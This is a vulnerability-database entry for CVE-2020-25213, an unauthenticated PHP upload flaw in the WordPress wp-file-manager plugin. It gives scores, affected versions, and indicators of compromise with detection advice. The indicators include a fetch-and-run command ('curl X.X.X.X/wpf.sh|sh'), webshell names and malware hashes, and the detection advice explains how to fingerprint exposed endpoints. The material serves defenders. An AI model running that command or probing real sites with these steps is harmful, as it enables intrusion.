cbcvebase.
CVE-2020-25213
published 2020-09-09

CVE-2020-25213: The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
97.33%
99.9th percentile
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.

Affected

1 ranges
VendorProductVersion rangeFixed in
filemanagerprofile_manager< 6.96.9

Detection & IOCsextracted from sources · hover to see the quote

url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
url/wp-content/plugins/wp-file-manager/lib/files/k.php
path/wp-content/plugins/wp-file-manager/lib/files/
filenamek.php
filenamewpf.sh
filenameshell.php
hash6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
hash5f1e0e3cc38f7888b89a9adddb745a341c5f65165dadc311ca389789cc9c6889
hashdd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839
hasha68ab806c8e111e98ba46d5bfdabd9091a68839dd39dfe81e887361bd4994a62
hashf1c5bed9560a1afe9d5575e923e480e7e8030e10bc3d7c0d842b1a64f49f8794
commandcurl X.X.X.X/wpf.sh|sh
filenamekinsing
otherreqid=17457a1fe6959
  • Detect unauthenticated POST requests to the vulnerable elFinder connector endpoint, which requires no authentication and accepts arbitrary file uploads
  • Monitor for GET requests to PHP files dropped under the wp-file-manager lib/files/ directory, especially with a 'cmd' query parameter indicating webshell execution
  • Fingerprint the vulnerable endpoint by sending a bare GET/POST; a response of {"error":["errUnknownCmd"]} confirms the vulnerable connector is exposed
  • Palo Alto Networks Threat Prevention covers this vulnerability with TID 59286; use this signature ID for NGFW detection
  • The Nuclei template matcher looks for both 'poc.txt' and 'added' in the JSON response body with Content-Type application/json and HTTP 200 to confirm successful exploitation
  • ·The vulnerable file connector.minimal.php is only present in wp-file-manager versions 6.0 through 6.8; version 6.9 removes the file and is not vulnerable
  • ·The connector endpoint has no access restrictions whatsoever — no authentication is required to reach or abuse it, making network-layer blocking the most reliable mitigation if patching is delayed

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck10.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.